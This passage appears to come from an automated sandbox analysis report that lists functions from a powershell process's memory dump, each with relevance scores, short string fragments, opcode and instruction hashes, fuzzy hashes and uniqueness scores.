                                                      • Opcode Fuzzy Hash: d4a00819638fac8c9a01427b9b2baaae0de4d90f239de12cfa5b82a1b3071f12
                                                      • Instruction Fuzzy Hash: 488129B1B053559FCB148B699804AABBBAAEFC5310F24C46BD905CB353DE31DC41C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745EF40 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$84sl$tPkq$$kq$$kq$$kq
                                                      • API String ID: 0-2319697288
                                                      • Opcode ID: d0fe20de72d44358047ad1eec884693ccc88b45afefaa23a75f4f6b03181e520
                                                      • Instruction ID: 009c223026f144c3fcb2056d91b701cf435e0824d04b8a154f74cef09ca61dfe
                                                      • Opcode Fuzzy Hash: d0fe20de72d44358047ad1eec884693ccc88b45afefaa23a75f4f6b03181e520
                                                      • Instruction Fuzzy Hash: 4261C3F161020AEFDB248E54C544BFB77A2AB45311F688467EC045B3D6CB35ED89CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07450470 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                      • API String ID: 0-1023320533
                                                      • Opcode ID: d2d7bc5e6c10e90581de3f55db1c27e15d9ad33812b7e71670e46fdba22f592b
                                                      • Instruction ID: 96aff80e07deec2832a82af63718a28e4b76c0183cb17237f938acaa6c691d68
                                                      • Opcode Fuzzy Hash: d2d7bc5e6c10e90581de3f55db1c27e15d9ad33812b7e71670e46fdba22f592b
                                                      • Instruction Fuzzy Hash: 124124B970430A9FCB258F3488102FF7BA2AB82311F1584ABD805CB3A2DB35C946C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745DA20 Relevance: 5.5, Strings: 4, Instructions: 480COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (okq$(okq$(okq$(okq
                                                      • API String ID: 0-1817140900
                                                      • Opcode ID: 9c2735dad0d13d0f1bf767d072c9926c4f75ea3042f43284a6b3fda94712a5ca
                                                      • Instruction ID: 8403fc858e3c3492b0395dcd4eb71b39d98f124c7a02dbe755eca002f97623d7
                                                      • Opcode Fuzzy Hash: 9c2735dad0d13d0f1bf767d072c9926c4f75ea3042f43284a6b3fda94712a5ca
                                                      • Instruction Fuzzy Hash: 4EF1F5B1B04209DFCB159F68D880BEB7BA2AF81311F14C46BE815CB396DB35D855CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07452D70 Relevance: 5.3, Strings: 4, Instructions: 273COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 84sl$84sl$tPkq$tPkq
                                                      • API String ID: 0-2302203880
                                                      • Opcode ID: b54a906fa5130a65fd80326175a5b2598ea0cae115085e239ce88f8306df6490
                                                      • Instruction ID: 40b84df7a5f353a7a2dab4b1c01f056ed2e13484e0bb34bfedc7847d418f18d1
                                                      • Opcode Fuzzy Hash: b54a906fa5130a65fd80326175a5b2598ea0cae115085e239ce88f8306df6490
                                                      • Instruction Fuzzy Hash: E6912BF17002069FCB249F69D840AABBBA6BF85311F28C46BDC059B396CA75DC45C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07455678 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ful$(ful$(ful$(ful
                                                      • API String ID: 0-100295639
                                                      • Opcode ID: 0b642ab9277fd29693f143dbe62c71cfe568953cd8ca474fb59ee4c2a61727f0
                                                      • Instruction ID: ba9c55c2b368019837b2f02d53a92dfeeea77f192e0a636c1ba8cbeea50e0394
                                                      • Opcode Fuzzy Hash: 0b642ab9277fd29693f143dbe62c71cfe568953cd8ca474fb59ee4c2a61727f0
                                                      • Instruction Fuzzy Hash: D67180B0E01205DFCB14DF98C545ABAFBB3AF88310F14856AD805AB766DB32DD61CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0745AA7C Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $kq$$kq$$kq$$kq
                                                      • API String ID: 0-2881790790
                                                      • Opcode ID: 7a1ec50747a969252c4ee1fdbfb9132c3ae75876c1790db43f161dc4feb60a24
                                                      • Instruction ID: 7264d5841aa16d15399784c572a88822cac5c6171087e67288369b87216c5342
                                                      • Opcode Fuzzy Hash: 7a1ec50747a969252c4ee1fdbfb9132c3ae75876c1790db43f161dc4feb60a24
                                                      • Instruction Fuzzy Hash: 1831C4B5B003469FCB358E14D5406FBBFB2AF85210B24C6ABDD048B243C7369885CBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07459648 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $kq$$kq$$kq$$kq
                                                      • API String ID: 0-2881790790
                                                      • Opcode ID: 1790d40c9e8624b904e1d4e0ef4318772faa2bcec01f24864586f404ba6b5d2c
                                                      • Instruction ID: 08f5a300487369542b381b6dfaaf10488a29dca18ff1da8b22875d511e634138
                                                      • Opcode Fuzzy Hash: 1790d40c9e8624b904e1d4e0ef4318772faa2bcec01f24864586f404ba6b5d2c
                                                      • Instruction Fuzzy Hash: 9C2129B1310206EBDB38597A9801BA777DB5BC0710F24893FAD05CB392DE79E845C360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07457590 Relevance: 5.1, Strings: 4, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,Sul$4'kq$d5ek$xSul
                                                      • API String ID: 0-2816686370
                                                      • Opcode ID: b94cd10ee7ba3946e563329cb76bf9198866172eb503121687d899b9ac6e218e
                                                      • Instruction ID: 86b5bd28ddb493d0f1d9a13c54561b368f178d6d09fee69693f74991511d5493
                                                      • Opcode Fuzzy Hash: b94cd10ee7ba3946e563329cb76bf9198866172eb503121687d899b9ac6e218e
                                                      • Instruction Fuzzy Hash: 663104F1B002079FCB228F189940AAFBBA2AB85354F14C177DE058F352DB30E951C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 07450308 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$$kq$$kq
                                                      • API String ID: 0-1727931526
                                                      • Opcode ID: a9524627af231ee1e381459ea4512172e390ae38c1fbd3a7ffd3b834ff87f951
                                                      • Instruction ID: 7e8940991b5a1aa4e0f8e94e2ba913b3c97efe0f84c7699ecaf3ee5f5a803aee
                                                      • Opcode Fuzzy Hash: a9524627af231ee1e381459ea4512172e390ae38c1fbd3a7ffd3b834ff87f951
                                                      • Instruction Fuzzy Hash: 6801DB2530A3D64FC33B163819201A66FB2AF8365073A05EBD481CB3A3C9198D0A83B7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%